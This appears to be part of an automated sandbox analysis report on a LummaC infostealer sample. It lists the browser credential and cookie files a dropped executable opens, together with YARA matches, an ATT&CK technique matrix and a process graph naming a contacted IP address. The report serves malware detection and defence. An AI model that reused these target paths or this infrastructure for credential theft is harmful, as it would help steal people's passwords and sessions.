                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 6.2.KyC6hVwU8Z.exe.400000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.KyC6hVwU8Z.exe.400000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.KyC6hVwU8Z.exe.436080.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.pPTyCqA3ru.exe.50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.3302655841.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.2794932818.0000000000052000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: KyC6hVwU8Z.exe PID: 2292, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: pPTyCqA3ru.exe PID: 2132, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: PfjsOcNiQfAmiszo.exe PID: 6180, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting
                                Valid AccountsWindows Management Instrumentation1
                                Scripting
                                212
                                Process Injection
                                133
                                Masquerading
                                1
                                OS Credential Dumping
                                1
                                System Time Discovery
                                Remote Services11
                                Archive Collected Data
                                1
                                Encrypted Channel
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault AccountsScheduled Task/Job1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Disable or Modify Tools
                                LSASS Memory241
                                Security Software Discovery
                                Remote Desktop Protocol1
                                Data from Local System
                                1
                                Non-Application Layer Protocol
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                                Virtualization/Sandbox Evasion
                                Security Account Manager2
                                Process Discovery
                                SMB/Windows Admin Shares1
                                Clipboard Data
                                11
                                Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
                                Process Injection
                                NTDS141
                                Virtualization/Sandbox Evasion
                                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                                Deobfuscate/Decode Files or Information
                                LSA Secrets1
                                Application Window Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                                Obfuscated Files or Information
                                Cached Domain Credentials1
                                Remote System Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                                Software Packing
                                DCSync1
                                System Network Configuration Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                DLL Side-Loading
                                Proc Filesystem3
                                File and Directory Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow135
                                System Information Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1572160 Sample: KyC6hVwU8Z.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 63 Multi AV Scanner detection for domain / URL 2->63 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 11 other signatures 2->69 9 KyC6hVwU8Z.exe 1 2->9         started        process3 signatures4 83 Contains functionality to inject code into remote processes 9->83 85 Injects a PE file into a foreign processes 9->85 12 KyC6hVwU8Z.exe 3 9->12         started        15 WerFault.exe 19 16 9->15         started        17 conhost.exe 9->17         started        19 KyC6hVwU8Z.exe 9->19         started        process5 file6 55 C:\Users\user\AppData\...\pPTyCqA3ru.exe, PE32 12->55 dropped 57 C:\Users\user\AppData\...\7Up9zvGH4w.exe, PE32+ 12->57 dropped 21 pPTyCqA3ru.exe 4 18 12->21         started        25 7Up9zvGH4w.exe 1 12->25         started        59 C:\ProgramData\Microsoft\...\Report.wer, Unicode 15->59 dropped process7 file8 47 C:\Windows\Resources\...\PfjsOcNiQfAmiszo.exe, PE32 21->47 dropped 49 C:\Windows\Prefetch\...\PfjsOcNiQfAmiszo.exe, PE32 21->49 dropped 51 C:\Users\user\Desktop\yTUtFuTG.log, PE32 21->51 dropped 53 5 other malicious files 21->53 dropped 77 Antivirus detection for dropped file 21->77 79 Multi AV Scanner detection for dropped file 21->79 81 Machine Learning detection for dropped file 21->81 27 cmd.exe 1 21->27         started        30 conhost.exe 25->30         started        signatures9 process10 signatures11 87 Uses ping.exe to sleep 27->87 89 Drops executables to the windows directory (C:\Windows) and starts them 27->89 91 Uses ping.exe to check the status of other devices and networks 27->91 32 PfjsOcNiQfAmiszo.exe 14 502 27->32         started        37 conhost.exe 27->37         started        39 PING.EXE 1 27->39         started        41 chcp.com 1 27->41         started        process12 dnsIp13 61 185.43.5.93, 49867, 49872, 49878 THEFIRST-ASRU Russian Federation 32->61 43 C:\Users\user\Desktop\oUNDhiUw.log, PE32 32->43 dropped 45 C:\Users\user\Desktop\dFZxqctW.log, PE32 32->45 dropped 71 Multi AV Scanner detection for dropped file 32->71 73 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 32->73 75 Tries to harvest and steal browser information (history, passwords, etc) 32->75 file14 signatures15

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                KyC6hVwU8Z.exe71%ReversingLabsWin32.Trojan.LummaC
                                KyC6hVwU8Z.exe50%VirustotalBrowse
